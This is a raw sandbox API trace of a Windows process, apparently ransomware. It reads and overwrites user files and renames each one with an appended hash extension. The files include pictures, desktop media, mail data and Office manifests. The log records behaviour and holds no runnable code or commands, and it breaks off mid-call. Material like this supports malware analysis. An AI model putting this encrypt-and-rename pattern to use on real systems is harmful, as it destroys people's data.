GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.867] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7709258, ReturnLength=0x714f8ac) returned 0x0 [0170.869] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", lpString2=".C5F23B07B40FE2A8FB66A60280B7ABB5C2082B022BD1122123E5CFF30EDA527C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.C5F23B07B40FE2A8FB66A60280B7ABB5C2082B022BD1122123E5CFF30EDA527C") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.C5F23B07B40FE2A8FB66A60280B7ABB5C2082B022BD1122123E5CFF30EDA527C" [0170.869] GetProcessHeap () returned 0x270000 [0170.869] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15c) returned 0x7733b50 [0170.869] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x7733b50, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0170.871] CloseHandle (hObject=0x594) returned 1 [0170.872] GetProcessHeap () returned 0x270000 [0170.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0170.874] RtlInterlockedCompareExchange64 () returned 0x3 [0170.875] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.875] NtQueryObject (in: Handle=0x604, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x75aa0b8, ReturnLength=0x714f8ac) returned 0x0 [0170.876] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log", lpString2=".FF4718228547995DA88AA1217E3823A5F20748B66A29C3F896D0615197A40544" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.FF4718228547995DA88AA1217E3823A5F20748B66A29C3F896D0615197A40544") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.FF4718228547995DA88AA1217E3823A5F20748B66A29C3F896D0615197A40544" [0170.876] GetProcessHeap () returned 0x270000 [0170.876] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x7418ab8 [0170.876] NtSetInformationFile (FileHandle=0x604, IoStatusBlock=0x714f89c, FileInformation=0x7418ab8, Length=0x138, FileInformationClass=0xa) returned 0x0 [0170.882] CloseHandle (hObject=0x604) returned 1 [0170.883] GetProcessHeap () returned 0x270000 [0170.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.901] RtlInterlockedCompareExchange64 () returned 0x2 [0170.901] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0171.822] WriteFile (in: hFile=0x5b0, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0171.834] RtlInterlockedCompareExchange64 () returned 0x5 [0171.835] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0172.030] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7709258, ReturnLength=0x714f8ac) returned 0x0 [0172.031] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpString2=".52AF33AB5EE535F6667D9EFC95C895992C59603A9F5DC5676D09B02C6E381F12" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.52AF33AB5EE535F6667D9EFC95C895992C59603A9F5DC5676D09B02C6E381F12") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.52AF33AB5EE535F6667D9EFC95C895992C59603A9F5DC5676D09B02C6E381F12" [0172.031] GetProcessHeap () returned 0x270000 [0172.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x43337c0 [0172.032] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x43337c0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0172.142] CloseHandle (hObject=0x594) returned 1 [0172.142] GetProcessHeap () returned 0x270000 [0172.144] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0172.144] RtlInterlockedCompareExchange64 () returned 0x2 [0172.144] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff) Thread: id = 105 os_tid = 0xae8 [0142.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.308] ReadFile (in: hFile=0x5a8, lpBuffer=0x755a548, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x753a410 | out: lpBuffer=0x755a548*, lpNumberOfBytesRead=0x0, lpOverlapped=0x753a410) returned 1 [0156.308] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.321] WriteFile (in: hFile=0x5a8, lpBuffer=0x755a548*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x753a410 | out: lpBuffer=0x755a548*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x753a410) returned 1 [0156.322] RtlInterlockedCompareExchange64 () returned 0x3 [0156.322] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.375] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x753a4c0, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x753a4c0, ReturnLength=0x6fef7f4) returned 0x0 [0156.386] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2=".4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927" [0156.386] GetProcessHeap () returned 0x270000 [0156.386] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19e) returned 0x4246768 [0156.386] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x6fef7e4, FileInformation=0x4246768, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0156.388] CloseHandle (hObject=0x5a8) returned 1 [0156.392] GetProcessHeap () returned 0x270000 [0156.394] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x753a410 | out: hHeap=0x270000) returned 1 [0156.394] RtlInterlockedCompareExchange64 () returned 0x2 [0156.394] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.486] ReadFile (in: hFile=0x5a8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0159.453] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0159.454] RtlInterlockedCompareExchange64 () returned 0x1 [0159.454] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.060] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x7422118, ReturnLength=0x6fef7f4) returned 0x0 [0160.061] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png", lpString2=".A648CFE99EE6113C3F94A341F45D025E249CD731C319E3EDA77F44CC2451E535" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png.A648CFE99EE6113C3F94A341F45D025E249CD731C319E3EDA77F44CC2451E535") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png.A648CFE99EE6113C3F94A341F45D025E249CD731C319E3EDA77F44CC2451E535" [0160.061] GetProcessHeap () returned 0x270000 [0160.061] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x74201f8 [0160.061] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x6fef7e4, FileInformation=0x74201f8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0160.247] CloseHandle (hObject=0x5a8) returned 1 [0160.250] GetProcessHeap () returned 0x270000 [0160.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0160.255] RtlInterlockedCompareExchange64 () returned 0x1 [0160.255] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.331] ReadFile (in: hFile=0x5a8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0160.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.467] WriteFile (in: hFile=0x5a8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0160.474] RtlInterlockedCompareExchange64 () returned 0x0 [0160.474] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.500] ReadFile (in: hFile=0x5b4, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0160.500] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.586] WriteFile (in: hFile=0x5b0, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0160.792] RtlInterlockedCompareExchange64 () returned 0x3 [0160.792] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0163.959] ReadFile (in: hFile=0x590, lpBuffer=0x757a558, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420) returned 1 [0163.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0163.963] WriteFile (in: hFile=0x590, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0163.967] RtlInterlockedCompareExchange64 () returned 0x2 [0163.967] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0163.989] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x755a4d0, ReturnLength=0x6fef7f4) returned 0x0 [0163.990] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", lpString2=".49DAA0B1F5CC0C97DE54D646104224F4ADC74DE853744FAC5AEFDF305DCA2E6E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.49DAA0B1F5CC0C97DE54D646104224F4ADC74DE853744FAC5AEFDF305DCA2E6E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.49DAA0B1F5CC0C97DE54D646104224F4ADC74DE853744FAC5AEFDF305DCA2E6E" [0163.990] GetProcessHeap () returned 0x270000 [0163.990] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b5d8 [0163.990] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x6fef7e4, FileInformation=0x35b5d8, Length=0x158, FileInformationClass=0xa) returned 0x0 [0163.996] CloseHandle (hObject=0x590) returned 1 [0163.999] GetProcessHeap () returned 0x270000 [0164.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0164.011] RtlInterlockedCompareExchange64 () returned 0x1 [0164.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0164.405] ReadFile (in: hFile=0x4a8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x7600, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0164.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0164.406] NtQueryObject (in: Handle=0x5bc, ObjectInformationClass=0x1, ObjectInformation=0x7582628, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x7582628, ReturnLength=0x6fef7f4) returned 0x0 [0164.407] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif", lpString2=".42440CBC19BE37326206531B5C7F1D97D1894E7B6A9AC7C1623BB0B941820509" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif.42440CBC19BE37326206531B5C7F1D97D1894E7B6A9AC7C1623BB0B941820509") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif.42440CBC19BE37326206531B5C7F1D97D1894E7B6A9AC7C1623BB0B941820509" [0164.407] GetProcessHeap () returned 0x270000 [0164.407] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4275f60 [0164.407] NtSetInformationFile (FileHandle=0x5bc, IoStatusBlock=0x6fef7e4, FileInformation=0x4275f60, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0164.409] CloseHandle (hObject=0x5bc) returned 1 [0164.413] GetProcessHeap () returned 0x270000 [0164.416] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582578 | out: hHeap=0x270000) returned 1 [0164.682] RtlInterlockedCompareExchange64 () returned 0x7 [0164.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0165.978] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74723c8, ReturnLength=0x6fef7f4) returned 0x0 [0165.979] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3", lpString2=".A18FEC9FDA8D94ABF3EC549188B3C47DECA595F72D6E2DFE9A70D3CEE2871D0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3.A18FEC9FDA8D94ABF3EC549188B3C47DECA595F72D6E2DFE9A70D3CEE2871D0C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3.A18FEC9FDA8D94ABF3EC549188B3C47DECA595F72D6E2DFE9A70D3CEE2871D0C" [0165.979] GetProcessHeap () returned 0x270000 [0165.979] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10a) returned 0x4267198 [0165.980] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x6fef7e4, FileInformation=0x4267198, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0165.981] CloseHandle (hObject=0x58c) returned 1 [0165.982] GetProcessHeap () returned 0x270000 [0165.983] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0165.988] RtlInterlockedCompareExchange64 () returned 0x3 [0165.988] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0165.998] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x75f0100, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x75f0100, ReturnLength=0x6fef7f4) returned 0x0 [0166.005] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav", lpString2=".93D52B484F32F3B4EE81A435B1888163EED8AF66DA99554941A1E828DD76AB6C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav.93D52B484F32F3B4EE81A435B1888163EED8AF66DA99554941A1E828DD76AB6C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav.93D52B484F32F3B4EE81A435B1888163EED8AF66DA99554941A1E828DD76AB6C" [0166.005] GetProcessHeap () returned 0x270000 [0166.005] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741c6b0 [0166.005] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x741c6b0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.007] CloseHandle (hObject=0x5b0) returned 1 [0166.008] GetProcessHeap () returned 0x270000 [0166.010] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0166.011] RtlInterlockedCompareExchange64 () returned 0x1 [0166.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.015] ReadFile (in: hFile=0x5b0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.015] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.017] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.018] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png", lpString2=".CB4BFF767DFE58413DB174D202FF6FC0899F53FA85447AFF12B56E8F5AAD4E79" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png.CB4BFF767DFE58413DB174D202FF6FC0899F53FA85447AFF12B56E8F5AAD4E79") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png.CB4BFF767DFE58413DB174D202FF6FC0899F53FA85447AFF12B56E8F5AAD4E79" [0166.018] GetProcessHeap () returned 0x270000 [0166.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42771e0 [0166.018] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x42771e0, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.019] CloseHandle (hObject=0x5b0) returned 1 [0166.021] GetProcessHeap () returned 0x270000 [0166.022] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.030] RtlInterlockedCompareExchange64 () returned 0x1 [0166.030] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.036] ReadFile (in: hFile=0x5b0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.036] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.038] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.039] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg", lpString2=".DA5AF7C664AF8293ECED6B283C31B8CBD16627734630917C9F4EC49A19347517" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg.DA5AF7C664AF8293ECED6B283C31B8CBD16627734630917C9F4EC49A19347517") 